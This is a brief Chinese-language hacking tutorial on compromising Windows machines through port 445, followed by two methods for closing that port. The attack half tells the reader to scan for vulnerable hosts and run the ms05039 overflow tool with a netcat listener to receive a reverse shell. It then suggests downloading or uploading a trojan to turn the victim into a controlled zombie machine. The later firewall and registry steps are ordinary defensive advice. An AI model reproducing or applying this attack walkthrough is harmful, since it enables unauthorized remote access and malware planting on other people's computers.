|
第一步,我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到!比如SUPERSCAN这个端口扫描工具。 第二步,假设现在我们已经得到一台存在445端口漏洞的主机,那么我们就可以利用瑞士军刀nc和溢出工具ms05039进行攻击: F:?>ms05039 目标IP 本地IP 1234 。。。 。。。 。。。 。。。 F:?>nc.exe -vv -l -p 1234 。。。 。。。 。。。 。。。 成功的话,就会返回一个shell,然后就可以用我们常用的命令了。比如让他去下载我们的木马或上传一个木马给他,然后运行,这样得到一只肉鸡的CDMSHELL了。 防范: 方法一:打开Windows 2000系统的开始菜单,选中“设置”项下面的“网络和拨号连接”图标,并用鼠标右键单击之,从其后的快捷菜单中,单击“浏览”命令; 在接着出现的窗口中,右击“Internet连接”图标,选中“属性”选项,弹出Internet连接属性窗口; 打开“常规”标签页面,将其中的“Internet协议(TCP/IP)”项选中,然后再单击一下“属性”按钮,打开Internet协议(TCP/IP)属性设置页面; 继续单击该页面中的“高级”按钮,打开高级TCP/IP设置窗口,选中其中的“选项”标签,并在该标签页面的“可选的设置”项中,将“TCP/IP筛选”选中,再单击一下对应的“属性”按钮,打开TCP/IP筛选的设置口; 由 于445端口属于一种TCP端口,你可以在对应“TCP端口”的设置项处,将“只允许”项选中,激活下面的“添加”按钮,单击该按钮,在其后打开的“添加 筛选器”窗口中,将必须用到的几个服务端口号码,都添加进来,而将用不到的445端口号码排除在外,设置完毕后,单击“确定”按钮,就可以让设置生效了。 方法二: 开始运行里输入regedit确定 找到HKEY_LOCAL_MACHINESystemCurrentControlSetServicesNetBTParameters 在右面的窗口右键建立一个名为SMBDeviceEnabled 类型为REG_DWORD键值为 0这样就ok了 |
|
|
